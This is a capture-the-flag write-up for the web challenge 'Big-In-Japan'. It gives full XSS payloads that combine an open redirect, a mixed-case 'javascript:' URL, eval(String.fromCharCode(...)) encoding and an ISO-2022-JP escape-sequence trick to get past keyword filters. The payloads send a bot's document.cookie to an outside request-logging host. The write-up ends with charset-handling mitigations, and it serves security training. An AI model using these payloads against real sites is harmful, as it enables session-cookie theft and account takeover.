Big-In-Japan

Category: Web
440 points
Solved by JCTF Team

Description

problem description

Solution

UPDATE: Thanks to Tomer Zait (the amazing CTF Organizer) for pointing out that we solved this one using an unintended approach. We’ve added what we believe is probably a more intended solution at the end, for completeness.

For this challenge, we got a simple website with a submission form labeled "Enter your URL here".

If we try to enter just any URL, we get an error: "Please provide a valid URL from the big-in-japan.appsecil.ctf.today domain". When we follow the instructions, we get a different message: "Success: The URL was clicked successfully".

So, we can enter any URL (as long as it belongs to our subdomain, at least supposedly) and some bot in the background will click it. This usually means that we need to find an XSS vulnerability and leak the bot's cookie.

In the sources, we have a pretty big helper - an open redirect snippet:

<script>
    const filteredURLFromBackend = "";
    const urlFromFrontend = new URLSearchParams(location.search).get("url");
    if (urlFromFrontend && filteredURLFromBackend) {
        setTimeout(function () {
            location.href = filteredURLFromBackend;
        }, 1000);
    }
</script>

So, if we visit https://big-in-japan.appsecil.ctf.today/?url=https://www.google.com, we'll get redirected after a second to https://www.google.com.

We can use a service that logs any request made to it and enter a URL such as the following:

https://big-in-japan.appsecil.ctf.today/?url=https://jctf1.free.beeceptor.com/

In such a case, the redirect snippet will be as follows:

<script>
    const filteredURLFromBackend = "https://jctf1.free.beeceptor.com/";
    const urlFromFrontend = new URLSearchParams(location.search).get("url");
    if (urlFromFrontend && filteredURLFromBackend) {
        setTimeout(function () {
            location.href = filteredURLFromBackend;
        }, 1000);
    }
</script>

After a short while we should get a hit in the service from the bot's visit. Once we've confirmed that, we can proceed to the next stage - leaking the cookies.
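As a rough sketch, the test URL can also be assembled programmatically. The build_redirect_url helper and the CHALLENGE constant are names made up for this example; only the url parameter comes from the page source. Note that urlencode percent-encodes the target, which should be equivalent once the server decodes the query string.

```python
from urllib.parse import urlencode, urlsplit, parse_qs

CHALLENGE = "https://big-in-japan.appsecil.ctf.today/"

def build_redirect_url(target: str) -> str:
    """Return the challenge URL that redirects to `target` (hypothetical helper)."""
    return CHALLENGE + "?" + urlencode({"url": target})

url = build_redirect_url("https://jctf1.free.beeceptor.com/")
# Round-trip: the `url` parameter decodes back to our logging endpoint.
recovered = parse_qs(urlsplit(url).query)["url"][0]
print(url)
print(recovered)
```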

We want to be able to execute some Javascript code to get the cookie and somehow include its content in the request to our server (for example, by appending it to the URL path). How do we do that?

Luckily, we can use javascript: URLs for that - these are special URL-like entities which actually execute JavaScript when navigated to. For example, we can try to visit https://big-in-japan.appsecil.ctf.today/?url=javascript:alert(1) and see what happens. However, we get an error: "Error: The URL contains a banned word: javascript". It looks like they're blocking this keyword to protect against these kinds of URLs. Fortunately, their filter is very simple and, more specifically, case-sensitive, while browsers match URL schemes case-insensitively: visiting https://big-in-japan.appsecil.ctf.today/?url=JaVaScRiPt:alert(1) actually triggers an alert!
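We never saw the server-side code, so the following is only a guess at what such a check might look like. case_sensitive_filter is a hypothetical stand-in that reproduces the observed behavior: the lowercase keyword is rejected, while a mixed-case variant slips through.

```python
def case_sensitive_filter(url: str) -> bool:
    """Hypothetical model of the check: True means the URL is accepted."""
    # Assumption: the backend looks for the exact lowercase banned word.
    return "javascript" not in url

blocked = case_sensitive_filter("javascript:alert(1)")
bypassed = case_sensitive_filter("JaVaScRiPt:alert(1)")
print(blocked)   # False: the banned word is present verbatim
print(bypassed)  # True: same scheme for the browser, different bytes for the filter
```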

We continue crafting our malicious code, and move on to trying to make a request via Javascript:

https://big-in-japan.appsecil.ctf.today/?url=JaVaScRiPt:fetch('https://jctf1.free.beeceptor.com/')

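This, however, becomes the following. The single quotes are HTML-escaped, and since entities are not decoded inside a <script> element, the resulting javascript: URL no longer contains valid code: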

<script>
    const filteredURLFromBackend = "JaVaScRiPt:fetch(&#39;https://jctf1.free.beeceptor.com/&#39;)";
    const urlFromFrontend = new URLSearchParams(location.search).get("url");
    if (urlFromFrontend && filteredURLFromBackend) {
        setTimeout(function () {
            location.href = filteredURLFromBackend;
        }, 1000);
    }
</script>

To bypass that, we'll use eval and String.fromCharCode to encode our payload, which in plain form is:

location.href="https://jctf1.free.beeceptor.com/" + document.cookie

We can define a Python helper function to encode any string we want:

>>> to_fromcharcode = lambda s: f"String.fromCharCode({','.join(str(ord(c)) for c in s)})"
>>> to_fromcharcode('location.href="https://jctf1.free.beeceptor.com/" + document.cookie')
'String.fromCharCode(108,111,99,97,116,105,111,110,46,104,114,101,102,61,34,104,116,116,112,115,58,47,47,106,99,116,102,49,46,102,114,101,101,46,98,101,101,99,101,112,116,111,114,46,99,111,109,47,34,32,43,32,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101)'

The result doesn't include quotes, making it safe to use in our case.
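A quick sanity check of that claim, as a sketch: Python's html.escape is used here only as a stand-in for whatever escaping the backend applies (the real routine is unknown to us). The encoded form should pass through unchanged, and decoding the character codes should give back the original payload.

```python
import html

to_fromcharcode = lambda s: f"String.fromCharCode({','.join(str(ord(c)) for c in s)})"

payload = 'location.href="https://jctf1.free.beeceptor.com/" + document.cookie'
encoded = to_fromcharcode(payload)

# The plain payload contains double quotes, so escaping would mangle it...
plain_survives = html.escape(payload) == payload
# ...while the encoded form has only letters, digits, dots, commas and parentheses.
encoded_survives = html.escape(encoded) == encoded

# Round-trip: recover the payload from the character codes.
codes = encoded[len("String.fromCharCode("):-1].split(",")
decoded = "".join(chr(int(n)) for n in codes)

print(plain_survives, encoded_survives, decoded == payload)
```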

Finally, we submit the following URL:

https://big-in-japan.appsecil.ctf.today/?url=JaVaScRiPt:eval(String.fromCharCode(108,111,99,97,116,105,111,110,46,104,114,101,102,61,34,104,116,116,112,115,58,47,47,106,99,116,102,49,46,102,114,101,101,46,98,101,101,99,101,112,116,111,114,46,99,111,109,47,34,32,43,32,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101))

A few seconds later, we get a hit on our server: flag=AppSec-IL%7Bomedetto%7D.
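The braces arrive percent-encoded because the cookie was appended to the URL path. Decoding the logged value is a one-liner:

```python
from urllib.parse import unquote

leaked = "flag=AppSec-IL%7Bomedetto%7D"  # value as it appeared in the request log
cookie = unquote(leaked)
print(cookie)  # flag=AppSec-IL{omedetto}
```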

The flag: AppSec-IL{omedetto}

UPDATE: The "intended" solution. Big-in-Japan -> Japanese text encoding

In our original writeup we described a mixed-case JaVaScRiPt: URI combined with eval(String.fromCharCode(...)) to bypass the challenge’s case-sensitive keyword filter. While effective, this turned out to be an unintended solution that exploits a superficial server-side check.

The intended solution leverages ISO-2022-JP escape sequences.

Background on ISO-2022-JP Encoding

ISO-2022-JP is a character encoding for Japanese text that uses 7-bit escape sequences to switch between different character sets, such as ASCII and JIS X 0208. These escape sequences can be exploited to bypass JavaScript filters, particularly in scenarios involving Cross-Site Scripting (XSS) or code injection, by encoding malicious payloads in a way that evades detection.

These sequences begin with the ESC character (ASCII 0x1B), followed by additional bytes that specify the target character set. For instance:

ESC $ B (0x1B 0x24 0x42) switches to JIS X 0208-1983, used for Japanese kanji.
ESC ( B (0x1B 0x28 0x42) switches back to ASCII.
ESC ( J (0x1B 0x28 0x4A) designates JIS X 0201-1976 Roman set, which is nearly identical to ASCII but with specific differences, such as the yen sign (¥) at 0x5C instead of backslash (\) and overline (‾) at 0x7E instead of tilde (~).
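These sequences can be observed with Python's built-in iso2022_jp codec. This is only an illustration of the encoding itself; a browser's decoder is a separate implementation and may differ in edge cases.

```python
ESC = b"\x1b"

# Encoding kanji wraps the text in ESC $ B ... ESC ( B.
kanji = "日本".encode("iso2022_jp")
print(kanji)

# After ESC ( J, bytes 0x5C and 0x7E decode to the yen sign and the overline.
roman = (ESC + b"(J" + b"\\~").decode("iso2022_jp")
print(roman)

# Ordinary letters are unaffected by the switch to the Roman set.
letters = (b"javas" + ESC + b"(J" + b"cript").decode("iso2022_jp")
print(letters)
```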

This encoding is historically significant for email systems and legacy web applications, but a filter that inspects the raw bytes does not see the same text that a decoder eventually produces.

In our case, we can use this (winning) payload: https://big-in-japan.appsecil.ctf.today/?url=javas%1B%28Jcript:eval(String.fromCharCode(108,111,99,97,116,105,111,110,46,104,114,101,102,61,34,104,116,116,112,115,58,47,47,106,99,116,102,49,46,102,114,101,101,46,98,101,101,99,101,112,116,111,114,46,99,111,109,47,34,32,43,32,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101))

The URL https://big-in-japan.appsecil.ctf.today/?url=javas%1B%28Jcript:eval(...) uses ESC(J (encoded as %1B%28J) between "javas" and "cript". This means:

The raw string becomes "javas" + ESC(J + "cript", which doesn't literally contain the banned word "javascript", so the filter misses it.
When the browser decodes the page as ISO-2022-JP, ESC(J is consumed as a switch to the JIS X 0201-1976 Roman set (nearly identical to ASCII), so the full string is interpreted as "javascript:", allowing execution.
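The two steps above can be sketched as follows. naive_filter is a hypothetical byte-level check (deliberately stricter than the challenge's, since it ignores case), and Python's iso2022_jp codec stands in for the browser's decoder. The point is only that the filter and the decoder disagree about what the bytes say.

```python
from urllib.parse import unquote_to_bytes

def naive_filter(raw: bytes) -> bool:
    """Hypothetical byte-level filter: True means the input is accepted."""
    return b"javascript" not in raw.lower()

# Percent-decode the query value exactly as sent: ESC ( J sits inside the keyword.
raw = unquote_to_bytes("javas%1B%28Jcript:alert(1)")

accepted = naive_filter(raw)          # the filter sees b"javas\x1b(Jcript"
decoded = raw.decode("iso2022_jp")    # the decoder swallows the escape sequence

print(accepted)
print(decoded)
```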

The vulnerability in this CTF challenge likely stems from the server not explicitly declaring a charset (e.g., UTF-8) or the browser falling back to ISO-2022-JP when processing the payload, allowing the escape sequences to be interpreted. This discrepancy between server-side filtering (raw byte checking) and client-side interpretation (character set decoding) enables the bypass.

Mitigations and Lessons Learned

To prevent such bypasses, developers should:

Explicitly declare charset (e.g., <meta charset="UTF-8"> or a Content-Type: text/html; charset=utf-8 response header) to avoid fallback to legacy encodings.
Normalize all input to a single encoding (e.g., UTF-8) before applying filters to ensure consistent interpretation.
Use robust input sanitization that accounts for multiple encodings, such as libraries that normalize input before filtering.
Ensure filters check decoded content, not just raw bytes.

For more details: https://www.sonarsource.com/blog/encoding-differentials-why-charset-matters/
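One possible way to harden the redirect check, sketched under our own assumptions: instead of banning a keyword, reject control characters outright and allowlist the scheme. This is a different technique from the challenge's blocklist, and is_safe_redirect is a name invented for this example, not the organizers' fix.

```python
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

def is_safe_redirect(url: str) -> bool:
    """Accept only http(s) URLs with a host and no control characters (sketch)."""
    # Control characters such as ESC (0x1B) have no place in a redirect target.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    # urlsplit lowercases the scheme, so mixed-case tricks do not help.
    return parts.scheme in ALLOWED_SCHEMES and bool(parts.netloc)

print(is_safe_redirect("https://example.com/"))
print(is_safe_redirect("JaVaScRiPt:alert(1)"))
print(is_safe_redirect("javas\x1b(Jcript:alert(1)"))
```

An allowlist fails closed: anything the parser does not recognize as http or https is rejected, regardless of how a later decoder might interpret it.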